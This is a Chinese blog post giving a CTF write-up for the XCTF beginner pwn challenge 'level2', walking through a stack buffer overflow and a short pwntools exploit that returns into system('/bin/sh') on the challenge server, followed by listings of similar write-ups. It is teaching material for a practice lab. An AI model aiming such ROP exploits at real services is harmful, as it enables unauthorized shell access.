xctf--新手区--level2

最新推荐文章于 2023-08-19 21:12:33 发布
最新推荐文章于 2023-08-19 21:12:33 发布
阅读量676 收藏
点赞数
分类专栏: # PWN # CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44108455/article/details/105613449
版权
CTF 同时被 2 个专栏收录
20 篇文章 0 订阅
订阅专栏
PWN
18 篇文章 7 订阅
订阅专栏

writeup:
checksec查看保护机制
在这里插入图片描述32位程序,开了NX和Partial RELRO

顺便运行一下:
在这里插入图片描述
接着放到IDA里面:
在这里插入图片描述在这里插入图片描述
在这里可以看见buf长度是0x88,我们可以的输入0x100个字符,我们在这里是可以发生缓冲区溢出
可是这里并没有像上一题一样有一个直接调用system("/bin/sh")的函数,所以上题的方法显然走不通。
还记得题目描述吗?菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’

对啊!虽然没有,那我们可以去找到system函数和“/bin/sh”字符串,通过强大的rop技术来获得系统权限。
我们找到了system函数地址是0x08048320
在这里插入图片描述现在找“/bin/sh”的地址,找字符串还是要用ROPgadget这个强大的工具,“/bin/sh”的地址是0x0804a024
在这里插入图片描述
定位溢出点,很奇怪我用工具并没有不能成功找出溢出点,就去看了一下别人的wp
0x88是程序中缓冲区的大小,4个大小是需要覆盖的ebp的地址,之后是函数的返回地址,所以在eip之前用0x8c的长度覆盖掉就好了
现在写出来exp

from pwn import*
r=remote("159.138.137.79",54645)
sysaddr= 0x08048320
binshaddr=0x0804a024
payload="a"*0x8c+p32(sysaddr)+p32(0)+p32(binshaddr)
r.sendline(payload)
r.interactive()

拿到flag了!
在这里插入图片描述

gclome
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
level2(xctf)
weixin_43868725的博客
05-06 556
0x0 程序保护和流程 保护: 逻辑: main() vulnerable_function() 很明显是一个栈溢出漏洞。 0x1 利用过程 既然系统给了一个system(),那么只需要/bin/sh就可以getshell了。所以要么我们自己构造要么去二进制文件中寻找。 找到了字符串之后就可以对漏洞进行利用了。根据32位可执行文件的调用函数的参数入栈顺序,我们可以将buf=‘a’*(0x8...
XCTF pwn level2
weixin_46128614的博客
02-03 388
使用ida打开发现buf只有0x88,但是读取了0x100,存在溢出点 然后存在system函数和字符/bin/sh 有一点不太懂,选的是_system的地址,而不是system的地址,看了师傅的wp好像是这题的system函数申明了一个外部近指针,没有内容,不太明白 然后就是构造payload payload=“a”*(0x88+0x4)+p32(sys_addr)+p32(0)+p32...
xctf pwn level2
weixin_64286326的博客
01-29 981
前言:只能说是看着WP侥幸做出来了,里面很多不懂的地方. 1 分析 首先下载把环境附件整下来 在linux下打开,checksec 32位的,拖进ida 进去后汇编界面根本看不懂,F5查看伪代码 用linux运行也是这样 发现有一个vulnerable_function()函数,点进去看一下 我们可以看出来 栈顶和栈底相差0x88个字节,但是read()却是0x100个字节 r,s分别是返回地址和栈底。 既然这样,我们可以利用栈溢出来g...
day-7 xctf-level2
a525024162806525的博客
09-27 113
xctf-level2 题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5055 拿到题目,查看一下相关信息:32位,开启了NX 放入ida查看: 代码比较简单,进入vulnerable_function()查看,程...
XCTF-攻防世界-pwn-新手村-level2
sifang_baweng的博客
04-11 430
XCTF-攻防世界-pwn-新手村-level2 XCTF-攻防世界-level0 题目链接: https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5055&page=1 下载附件,拖进IDA, ...
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF-Mobile】新手练习-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF PWN level2
prettyX的博客
06-10 234
查看基本信息 尝试运行 IDA F5 继续查看脆弱函数,88h的缓冲可以写入0x100,发现溢出点 shift+F12,发现了“/bin/sh”
level2 [XCTF-PWN]CTF writeup系列6
重新启程
12-19 556
题目地址:level2 先看看题目内容: 照例下载文件,检查一下保护机制 root@mypwn:/ctf/work/python# checksec 15bc0349874045ba84bb6e504e910a46 [*] '/ctf/work/python/15bc0349874045ba84bb6e504e910a46' Arch: i386-32-little ...
XCTF-pwn level2 - Writeup
菜小狗.的博客
08-02 4972
XCTF-pwn-level2 WP 终于可以写这个pwn题的wp咯~ 很开心,说明我又有一些收获来解决了一些问题 题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ 先将elf文件下载丢到乌班图里查看一下文件类型,通过checksec查看一下保护情况最后在运行一下瞅瞅到底运行起来是杂肥似。 可以看到NX这项保护是开启的状态,这意味着:栈中数据没有执行...
XCTF-PWN-level2-WP
l2645470582_的博客
08-02 201
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec 4 3、该文件是32位文件,用32位IDA打开该文件 3.1、shift+f12查看关键字符串 我们看到"/bin/sh"的地址为:x0804A024 3.2、双击关键字符串,按Ctrl+x,再f5进入main函数的反汇编代码 3.3、我们看到关键函数vulnerable_function(),双击进入 3.4、我们看到buf溢出,双击buf查看字符串 buf:0x88...
sctf-level2
just do IT
07-10 263
查看程序保护措施 查看IDA 有system函数但是没有 '/bin/sh’字符串,bss段可写 思路 利用read 函数将’/bin/sh’写入bss域 , 再调用system() 函数 。根据IDA偏移量为0x88 ...
二、从零开始学逆向之XCTF-logmein
nini_boom的博客
07-03 604
点明主题,这道题涉及到算法。 使用exeinfo了解是linux64位文件,使用IDA打开。 主要逻辑部分在于 v4 = (unsigned int)(char)(*((_BYTE *)&v8 + i % v7) ^ v9[i]); 调到sub_4007F0()就算赢。 OK,既然是C语言写的算法,推荐C语言来解。 这里的IDA出现的_DWORD、可以不用管,十分底层的姿势,你就认为是普通unsign int就可以了。 _BYTE可以用unsign char来代替。 写代码这回事,多写就能懂
CTF-PWN-level2(x64)(Jarvis OJ)
SuperGate的博客
02-15 495
这道题和level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。 由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。 同样的,程序中hint存入了/bin/sh,我们直接使用即可。 system函数的地址也很容易获得,剩下的就是pop e...
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 644
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
攻防世界xctf PWN leve2详细讲解,两个地址方法
最新发布
qq_45200829的博客
08-19 195
bin/sh 字符串有,system函数也有,齐活了。溢出把返回地址改成system的地址,再加/bin/sh参数就能拿到shell了。32位程序,启用的保护不多,启用了NX防护。
guess-xsctf
07-28
chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值